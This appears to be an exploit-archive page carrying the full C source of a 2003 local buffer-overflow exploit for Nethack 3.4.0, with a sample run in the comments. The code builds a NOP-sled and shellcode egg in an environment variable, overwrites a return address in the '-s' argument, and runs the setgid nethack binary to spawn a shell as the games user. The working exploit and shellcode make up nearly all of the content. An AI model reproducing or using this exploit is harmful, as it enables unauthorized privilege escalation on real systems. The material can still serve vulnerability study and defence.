DSR-nethack.c

DSR-nethack.c: Posted Feb 20, 2003; Authored by Bob | Site dtors.net; Nethack v3.4.0 local buffer overflow exploit which spawns a shell as uid=games. Runs /usr/games/lib/nethackdir/nethack.; tags | exploit, overflow, shell, local; SHA-256 | d36c9676766104ed6f0e30024d355ec827f58589e60d86e963361827c6ef5db0; Download | Favorite | View

DSR-nethack.c

/* DSR-nethack.c by bob@dtors.net
 * Vulnerbility Found by tsao.
 *
 * Local BufferOverflow that leads
 * to elevated privileges [games].
 *
 * Basic PoC code...nothing special.
 *[bob@dtors bob]$ ./DSR-nethack
 *
 *       DSR-nethack.c By bob.
 *   Local Exploit for Nethack 3.4.0
 *       DSR-[www.dtors.net]-DSR
 * 
 *   ret: 0xbffffd86
 *
 * Cannot find any current entries for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA†ýÿ¿
 * Usage: nethack -s [-v] <playertypes> [maxrank] [playernames]
 * Player types are: [-p role] [-r race]
 * sh-2.05b$ id -a
 * uid=12(games) gid=501(bob) groups=501(bob)
 * sh-2.05b$ 
 *
 * www.dtors.net // www.b0f.net
 */
#include <stdio.h>

char shellcode[]= /* shellcode by bob */
            "\x29\xc4\x31\xc0\x31\xc9\x31\xdb\xb3\x0c\x89\xd9\xb0\x46\xcd\x80" //minus
    "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
    "\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80";


int main ()
{


        unsigned long ret = 0xbffffd86;  //Redhat 8.0 i386

        char buf[224]; 
        char smeg[1024];
        char *ptr;      
    int i=0;   

  fprintf(stdout, "\n\tDSR-nethack.c By bob.\n"); 
  fprintf(stdout, "Local Exploit for Nethack 3.4.0\n");
  fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");
 
  memset(buf, 0x41, sizeof(buf)); 

        ptr = smeg; 

        for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = 0x90; 
        for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; 
        smeg[1024 - 1] = '\0'; //null byte

        memcpy(smeg,"EGG=",4); 
        putenv(smeg);

        buf[220] = (ret & 0x000000ff);            
        buf[221] = (ret & 0x0000ff00) >> 8;
        buf[222] = (ret & 0x00ff0000) >> 16;
        buf[223] = (ret & 0xff000000) >> 24;
        buf[224] = '\0';
        
        fprintf(stdout,"ret: 0x%08x\n",ret);
        

        execl("/usr/games/lib/nethackdir/nethack", "nethack", "-s",  buf, NULL); //weeoooweeeeooowooo
        return 0;
}

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

DSR-nethack.c

DSR-nethack.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

DSR-nethack.c

Share This

DSR-nethack.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems